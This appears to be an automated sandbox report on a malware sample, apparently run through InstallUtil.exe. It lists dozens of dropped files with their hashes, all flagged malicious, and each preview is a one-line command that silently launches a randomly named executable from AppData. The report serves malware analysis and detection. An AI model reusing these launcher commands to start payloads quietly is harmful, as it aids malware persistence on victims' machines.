                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Tdi/+o+s:fE1wkn23Rlls
                                                                                                                                                                                                                                MD5:1B7D8205A888136B439DE784C71F91E4
                                                                                                                                                                                                                                SHA1:3538E9194F606B120064E7466E39449CB79F8DD9
                                                                                                                                                                                                                                SHA-256:FF9D9082E0CDE2BEB6D27C7EC9BAB0620DA49862CAD999D5A20EAFD1060D8611
                                                                                                                                                                                                                                SHA-512:355F239DE4E3D0EB6C1548C7435B87B8D6D54B4F6D46B029608BD3D4673EAF079F84185DBA019CFE7384609C57A2E311A550C4865583DFE4D7ED9CC68EDA39E8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\v8Qne8bNiHZnpvaf2IGXNklf.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.048822783172895
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5fQWQnfuJD209/HFn:fE1wkn23LQnfuD9/l
                                                                                                                                                                                                                                MD5:5C1FBB576D76994516E72682F44E1AB3
                                                                                                                                                                                                                                SHA1:58CE7C42AB57BD29F64405E27096D979E8F003C0
                                                                                                                                                                                                                                SHA-256:C493C67867AF4A7C7637D232F48ADB3292E6BAD945731AB979FA3452DA79389C
                                                                                                                                                                                                                                SHA-512:E0B8452FC5B1D8126B21DD2E8AE8AC0DF1A3A53FE6BBD2991CB0FAD633B90AD4D20A7CD4F151A10FA521FD91220773EC0847FEA85294E341AA519ADDFF1192CC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zON35BfDXHyPfdPSNEInc2BT.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.990851768680142
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5za0glC0LdJHFn:fE1wkn23O0KRJl
MD5:6035C495CC0EE733A7C70DE96DBD01C7
SHA1:25E47C2F1EE63178E3C0E972603285581A29063B
SHA-256:7CCA2423064B2EF975E78694DBB40009AEACE3373EFF5D38A17A032B6C8DF462
SHA-512:EEFAE5F45A257BFB14239B645663900AFB8ACEF3B4ABBA29167B42DFD60F5816327A72DC47A8F7D3F787E308B9773DA35987E15CDCA2151BB8211F01CBB9B866
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\VQkEy4WzpKPECwgnQtVBm3BT.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.898612232787384
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J59AqcJh+1I8F:fE1wkn236+CU
MD5:8856A9EBE2085337F7C97C3910E61851
SHA1:B94AC7329BB11D46D65218DD19D15B637264648E
SHA-256:5C70D9B074753A9E16ED99FE052268C55BE81D35DA559BDC818F761D36D675B5
SHA-512:2EFF3B1E1B865B64E3568AE5FFCF8AA744DB7A6FD0F636389A085AC1221AADE5BD7F717E125756E921D63CDC79BCABF8152A8A5B1B33418344C84FD8C0A5FA66
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\XexwpboKjyWVbo8FFgPmChDN.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.846298602723083
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5k0J56Iln:fE1wkn23ky56Il
MD5:E8B79FEF5D68D5F2AB2545BA213116BE
SHA1:2C73098520EEDDA7AC545C417AC40FD3FBADC92A
SHA-256:86CBB8945998713DDE7E69475E74044013A26B402A787443C12D54A685AAEB77
SHA-512:C4186E09B727EAA6DEE6F8B6C9587EC118AEACDEF4716FC20FC13988B02B8145736D4A1AE703E5BCB969BEE87ADC8C4360210387CA4EE03671199685BDEFAA59
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\Ae4UYt4QuRmNhlRoOAHyWthz.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.92194035560531
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5cMdKAih+ln:fE1wkn23cMIAiy
MD5:D039109E52E79DFA0406BE099C481C47
SHA1:F93A25393F222A10B2B4A05D447448681EB7652B
SHA-256:0D43E6BD9A8E93A4C0291F0603CC91C4FCC32413E485BA9352CF169F55C34D22
SHA-512:0A6DD93183D8041AEBBC6BD0BB442A8B3664845FFB2C2A3D88E68E8C76972DD25A7420629B612A1E1616089EEC572BC12741507EE661D1EE79026379FFBBEFDD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\yjgJ9nt4OTDWzyoY4NSDLOwM.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.79926798681241
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5RTA27giW00kqaC4mn:fE1wkn231A2v0kiv
MD5:37F97A6117F8CB58EEBC1BD63A84E827
SHA1:0319D77F3F4BF6C753880F0F8689FA8A6BDD9142
SHA-256:1F9B5D11B81CE3CDB406224C62720CB172183BAAF5E420E3E142CE3E7FC0B140
SHA-512:569BC6D1D32460BD385A2C009FC1F844945BDCBE3FD8FB3ECEC99862E74F340C42B81FF138672502C78C3A9E45881FA39CE91B2693E1B49145460DBB71628341
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\t6FVjUQyIYOEGsrhSQAlAtYA.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.783044574076702
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5VhSSxEHx/lMVm:fE1wkn23LSKEHxqm
MD5:BB8419C70F5077652A68B3E1CEBFB826
SHA1:1D00CF31FA7BD2E48DB85F20FB330E56FB3C008B
SHA-256:D24B96ABBBC6BB40699D25E1129369F29472CDBBD902A4EC41583B8E2FEB794D
SHA-512:A684DBE64512EAE4B9569AD88ECE3A5A99967F04B4F8826484CA422D75A8277D149A444AFBF043BCC1C8B57A6BC9CBA35B448837DCA6E65F3FC027BE7D4130EE
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\0DNcwfMmaLL5AZJSs5jeKfoN.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.048822783172895
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5U7oTF0Tn:fE1wkn23U7oT+
MD5:44106DE101533B9488E02F835044634B
SHA1:43F1C596E1614077440B213FFEB06E1DC37EA23E
SHA-256:7CC19400C65B06E28B17C5C68DDC4216BE4D39897F33C3C4B19869301B6E0329
SHA-512:028505ADEAEE772DB7A247A63DAAA1251A129EA379145CDED345B03CE8F55A1657DB9F9E84299EE7F43BA719EECDB5CD58E74BA2F2417CA5596C4D7762C27757
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\qtBU2wcdiddM8Ew6K9GV1QbJ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.799267986812411
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5ovDM7oBSpL:fE1wkn23ovDRSF
MD5:C997E318422804B5FB6D253EE21F93D6
SHA1:8D2B6674E80311148A936803483EB2C359F03BDF
SHA-256:C215BF951A1CA2ED67F6BD489BB13B0FB56F66872EA66665E02AAE816234418B
SHA-512:CC5AC92661C9E8490CE77059B95F32C61ED7630AD2B905F006206ACB8DAA09A311E0B3F08F38DE7959D361625E603C30FA36F689BBBF0737B66B7BDD1726A8A3
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\MzHVcwfiHGLesknyk5lMjLDt.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.898612232787385
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5TpzF9Jl:fE1wkn23tHJl
MD5:7C27C20544A096CC4B310DAB113D0740
SHA1:9DA6E26BEEF3A3BE74A9FC4500AD8E37B04EDD69
SHA-256:71AD1026FCF91D270783362AA791B709838340678C4B20E6F102428114BC35DB
SHA-512:5FD4242AAC825686D06A6E01BE9DA68E980EB08BD83B179B7F30F313AAC35939DFFB11A97FB70F9741553AD1526BBE5217C0EA58D8DDC2BF339E5DFC218779B0
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\vMDfzN6ieihUJhAninw4nHZX.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.994220736727779
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5fFAO8+yGdcw4CSkdan:fE1wkn23yY4D
MD5:743E04D5AFD76688F47240F8DB907283
SHA1:AF253508F09B16E9AB450A5A4949B725958DB2E9
SHA-256:CDFA56B95BDA73FD33D0CE1743075D0970B524ADCC830629F20215A084310912
SHA-512:A17F872F45CA013AD1232ACB0C51D289DF73E7B15B837C1D99A9E47B31C493CDC286FA07C211B57161697AA7563A800E05F20D0464052DD615F896E133CFA627
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\zILQneSJVLXUhxcgTc89dcSy.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.956583247280139
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5UruOoqNA+RCJln:fE1wkn23UlhN9A
                                                                                                                                                                                                                                MD5:1879B432F03E26F52F9B582EF7C0F844
                                                                                                                                                                                                                                SHA1:B58F83DB408C07082C3D271FD0AD2962862F2E1C
                                                                                                                                                                                                                                SHA-256:429E9BA66EEBD2E1516FD8E8ABFD2CA89DFB05856BB62B9912C38C20638044C0
                                                                                                                                                                                                                                SHA-512:2A0497942BAA0C85B602AC1C952281CFA9C653138948858E9BED939FB209F19A10F27D82ACCF1EF0AAB23D8A779CBB0E531DEC9076DC7C2ECEBC2EF362CA6D43
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\1NKkMLyw9h7c8epRkEFEngCg.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8690202910487415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5uZO1vfGgpJJl:fE1wkn23uZ0f3Jl
                                                                                                                                                                                                                                MD5:8255E9DEF7AB2C5E62BD8CED427CDD83
                                                                                                                                                                                                                                SHA1:46E5CDDF0A709312B310D06C6519A0AA9F579660
                                                                                                                                                                                                                                SHA-256:EB096AA6A821C44899345C7B9023F2FE28E7EF5C37E4599D89905B97B79600C7
                                                                                                                                                                                                                                SHA-512:BA27FACA70E6AF0B85E51CBC8866459AEF5028673723F9C45537A397311679E5249F560AB851DE28A0C5D6E43D1EBDA22B416C15335806CE9D01E904182681F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\K7OlehBeK7vDe9ywIcEpfFfd.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.945642848698059
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5wrJRPylEXcxL4mn:fE1wkn23wdRJcxLv
                                                                                                                                                                                                                                MD5:F905020DB710AAD2C27C1BAC6464DB92
                                                                                                                                                                                                                                SHA1:E8D3A5C08F00A6D4887FC09BC2AB1362D2F9FFC1
                                                                                                                                                                                                                                SHA-256:2A46EC07AC9CE896B6C1531DB63122DC95D3E321BC917710595F71F5D996938E
                                                                                                                                                                                                                                SHA-512:7E1C68A1AA038E86A792244D351A575A52EA6967414599A89A4369DD3CB1E4F93AAFAE2D213E76681763F3336EA2FCE98669329DCD3070103C6DF921128263D4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UNl4vFmh5HIxFXbaSLodV9jl.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.802162638119942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Lc+xcAsn:fE1wkn23oAs
                                                                                                                                                                                                                                MD5:95D9BB52C66DC3C1FB4773B55F5FE030
                                                                                                                                                                                                                                SHA1:11D5F48153AA99EB0A47125C4DFA404D3B43E81F
                                                                                                                                                                                                                                SHA-256:6C42329CC7F47160E5ABD324A5EE51F94DCF2D7D6BEE187110E9F2A61F046EF6
                                                                                                                                                                                                                                SHA-512:259B64C79659ECEE363974A18FF3DF161FECAC9F58D5D2D048B74B8EE201A9503CD6633143F0C6CA734925767B0512604CD1F7817A817AFDECAD610FA406D908
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nNmaiuLbBvtjFhtSarVAt2ZV.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.066867891837193
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TN2ypMHumLACl:fE1wkn23Z2BHuEl
                                                                                                                                                                                                                                MD5:1BF24334C1555A61C1CFE169DB2E90DF
                                                                                                                                                                                                                                SHA1:B22304A4D00039B8D20A2575A3C3A2B91D0D90A9
                                                                                                                                                                                                                                SHA-256:96908A3FC42FB54B960C5245FCC3E0A2700FAEFE9B6CA946BDBF35E7D5502C64
                                                                                                                                                                                                                                SHA-512:E2B821F8B6EB6A33040DFE005C2C4AA77B30E56203CC78225C44DA1FA8309A202B782E4EAF7752DE1931D2CAD178C4DCA2F5CEE6C68895715CDE5D9B93CE9C46
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.77738718964825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5S4cbcosZdCl:fE1wkn23S4cfKs
                                                                                                                                                                                                                                MD5:16C872533F1E9460366D8AAD3BD7A05F
                                                                                                                                                                                                                                SHA1:D8BB0D47645894F1D152E1549F0911AB89A265FC
                                                                                                                                                                                                                                SHA-256:220E675BBBE8A4B921FBBEF968E9FE86FA6A224C2C5D45FA9EED0CC4CF9F787E
                                                                                                                                                                                                                                SHA-512:35F4D37CE6F5099DEFC703BC0064D9D67086BBB67A46F3F65571E5C743AF78E91C07811863380CC86BA0304564039A04A841CF3A2381EC2051A01FB482CFDAE7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wXxranKwriDbPr8wnfU8IA5G.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842462914223222
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5LrVJYjkAdAl:fE1wkn23VJukAs
                                                                                                                                                                                                                                MD5:F6E16FBEDAE355EEA71E14647B1955E1
                                                                                                                                                                                                                                SHA1:C18A95E0342B26F7A343BDB29C6165D0A62B4FF4
                                                                                                                                                                                                                                SHA-256:3793A142D057980F7CC7CD0BC3E9E470F62EFC6675CA71FBDEC254E21AB958C6
                                                                                                                                                                                                                                SHA-512:47065767B1CE6D6316C9957E191E307CBFA58F206ED6A9015A05CEC8739C79660D7A1016A04F77C617CED5AE3D4E6A1F0DFD75518B2942B94B51973D2740980A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nPlq3xTmye2f3pu3slr0k49k.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
Entropy (8bit):4.887671834205306
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5rRRfekWdd+vMln:fE1wkn23tRfJLEl
MD5:46BC1CBAE1657D5C040B09E480FDD544
SHA1:819CD117CDF807B045356E86B521F7F208E52B50
SHA-256:B9CD3E54F4941D0D16378E71EFD44AA1832BF9DE968A3F85241352BDF8CD4643
SHA-512:33AE8E0F51BAFF1B0D5186A092505AA2E4109D712C97191295ABF6F043F1FB4037BA1D3AB169051A9D541882F0FBAC3C5E967AD58F44249EAFC94BB2AA5B3C39
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NQMtpPx9qXPy8v0LlF2Kjrle.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.802162638119942
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5rk8uGzJQQs:fE1wkn23RuG2
MD5:6D9F306EE7E69B44FD102D4107078997
SHA1:A04A6368FEF17CA442B36E1366F92F98E3E69523
SHA-256:C6038C55F1973B2EB4D7720E60F40AF879B08727FAA9C369CFB91F97C2516E88
SHA-512:8AD15896D434A3A2F64C8826C4FD2A65F8C04A48F1D0C98B7030DB663E86286592EB1B1BC0C08A5FA6E8654B2A0523CB36A592B9B2C9DF92D0DC0A8952DCD2EB
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NAHYKKwmljWteoQSQ7emQ5vj.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.905716942869603
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5PqVwLXoc95L:fE1wkn23iV+XoE
MD5:DCA4D40D0BC7C315C3A0BF5A60C3F185
SHA1:ADE4CA31AD37A474E246FC0E3E3830EC761E2593
SHA-256:8FFD01801D3853C761568259CA985BF790EEECD051374E7726F7F032E8054BDB
SHA-512:472E75F90A188F5BCAA55D9E7C852EED5F5ECBD6E80AB1D732A9F1941B0BBDFD5D1FD29DDA02B36FB850DACC51F5F988C7F0EF05FED04B88620EF7811E6FFEED
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\jNfRjwpCJu7ns5MyIyIgDq2I.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.871074051194774
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5L3EIq7c2PMdm:fE1wkn23UT
MD5:C14153ADE9E20219F8212834EE4CF820
SHA1:E31E267B766AB72020275A803DD9CD6656ED691C
SHA-256:0EABC88A12FBB616C731EC67960D2B8BEB15B06951A8DA8C0831F2970592161C
SHA-512:71228448ECBA96BD7F34B71A769CB0BA83192B9319D4E99B89A2D96A1CEA4AD084D0D7B86358D0B0E5E37E2DA3DA766C4D0DA18713485E995A1B1054AFE06A56
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\nacv1V5amvW0txqp8nJ7QSVf.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.949776292283334
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J52CWh/jcxCFIkdan:fE1wkn232CmgFD
MD5:E3FB6DEB9B6418081EAACCF14173D405
SHA1:E308E3C429BB0892F059D76465921E900C44F8A9
SHA-256:DC0064726119A8A9C99BCD901731B756730657F9F5688525962749D2340614AA
SHA-512:34E0FF58CBFC7CCCA7A198EA8077F3902D3A0330B07A1D6CB4F235741EDE996D63E63483F83D02DDF0246EE5859ABA638C440A720A7EA7118E33894E90896D87
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exe" --silent --allusers=0
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.927597740033761
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5jIjwWTNqFln:fE1wkn23c0UNqn
MD5:7D8E9ADDCF10AC3EB7972CA4CF12E168
SHA1:980779EC2F2EAAD1EC02D503922D50E251D9FD69
SHA-256:1851FE3EBE447AC8630655EB63338F19D830C70EDB20084FF3552BA1B54C9689
SHA-512:57C0ACC541E6CADDD08328DBC729B61F912166C09FAC7E9A6B1C75114B0947781D570F22C03DC88786D396B76EA584D1E4CC25806F5855007971C2140DBDA0B6
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\FPqrFrEMEodivHfNwvaAYSOn.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.908737475466189
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5hogi98nZFUASkdan:fE1wkn23fisa/D
MD5:806F535CC0623C951A2A29CA38C41D8F
SHA1:F19B921BB830A71FBAEDFCFA4718AB15602684D8
SHA-256:9C79CE4515BCE49B0B245EB2326690EB8B3A1387992CEF554CD379D585FA591A
SHA-512:D6FC551B498972F0A6ACDFAA9F6A346850C2066BC7676DB96CF4D279D735D9B1185B328E3F0A801B660DCC5EFA7F7EA75081D3E57CBA081169B619E76C205B4C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\DMECl6rKVeXO0VOyuijXmPsf.exe" --silent --allusers=0
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.836805529794771
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5gtOhlzdwdAl:fE1wkn23gIR
MD5:0D1F672F71A242A3B2F4B6C5E6AF17E8
SHA1:141E0B7B7644AA6ADB889A6DC25490824D91DFBA
SHA-256:842255F077198E68DE336522EACFDBF1CEC76C04B02CEFD7D0C99BF76664FFDE
SHA-512:0BF02F42543B7E271F8DF9C9F715E5A3A13B7D8CAFCC3EA580DB1BA85F3AF88A117D4014814AE966485F54C589CE3FA47073733DE4B44BE6A8BA29A5E41EF6C8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\EHUfUZeP6l6RDehwxBVxTksR.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.829700819712552
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5HmsU+jN/IHF:fE1wkn23Av
MD5:60D4FBC28D842C23D6C562BBAF9EA6C4
SHA1:428083C6080AB64C3B05A11AC4D553400EB3E8EE
SHA-256:C8488567C24C67F97A832C5DC2328BD8D34E03897701EC49EFC5D8BB06F5C44A
SHA-512:7B8037A7B72EC88CB41B51D82FF8E710E29A196E2599621138D8E43C6DF546863C26A3EC8B4BF3D0313B16EDA3CA9A3972E040AB86BDA056C4267E44D9385932
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\bzkeEcACtFKnoC1UuUSbz0OB.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.91099995702323
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5mbESiynQ2nSLAs:fE1wkn23mb9iynYAs
MD5:2E07C293D3B4E10C61721C91D2731FC8
SHA1:7E9ABBE1558A17898A5759C33CA71BA969B3757F
SHA-256:7520321E6A41F7E60EC061F34CF1A40DCF93076E7B0FE9742A3C8A0D1E7E48C0
SHA-512:BF172341C904BE2EAB791CC003EE1EC099D8AFEF22D0DFC5DEA33A42CAA9C383E3F11D8958B4FE353E7B552B7D231DA06963B943283E84AA446F3DB44A1FA9B8
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\CTBhrqB7vKJROnvunuZcUFAZ.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5jHSTAnjKpF4mn:fE1wkn23VjKpl
                                                                                                                                                                                                                                MD5:5F6A00900CBD76C682978EDFF46CC1F1
                                                                                                                                                                                                                                SHA1:A5E2E7006A1B1E1210E51C28130B9DF475ED94F4
                                                                                                                                                                                                                                SHA-256:6D634195456B26EFE88CECD09233FF69BA5B9C7B74A3FCB23F65A33FD1DFC6C6
                                                                                                                                                                                                                                SHA-512:017F185DF774051F2685FFB50E09532DEE116BCEF373D072F43B1284B8CDF5CBC19141ED0AAF35A935702F55D173433B33AF17C58F32B90819BB8AD8841051C5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FB8WWwveYgNXuiUkbF3okOil.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916657341451683
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5wo+gvNMSrELAsn:fE1wkn23wo+0NTrE0s
                                                                                                                                                                                                                                MD5:9C1BA3BB21AD12EC50B3807BE9B24760
                                                                                                                                                                                                                                SHA1:9F8A9E70B9C33EE7FE808E30806B803F59B92891
                                                                                                                                                                                                                                SHA-256:32F2C22F5B75272518BDAF3EA37C4A1E2324BEEDCEE56E4F00AC27B1D37B8969
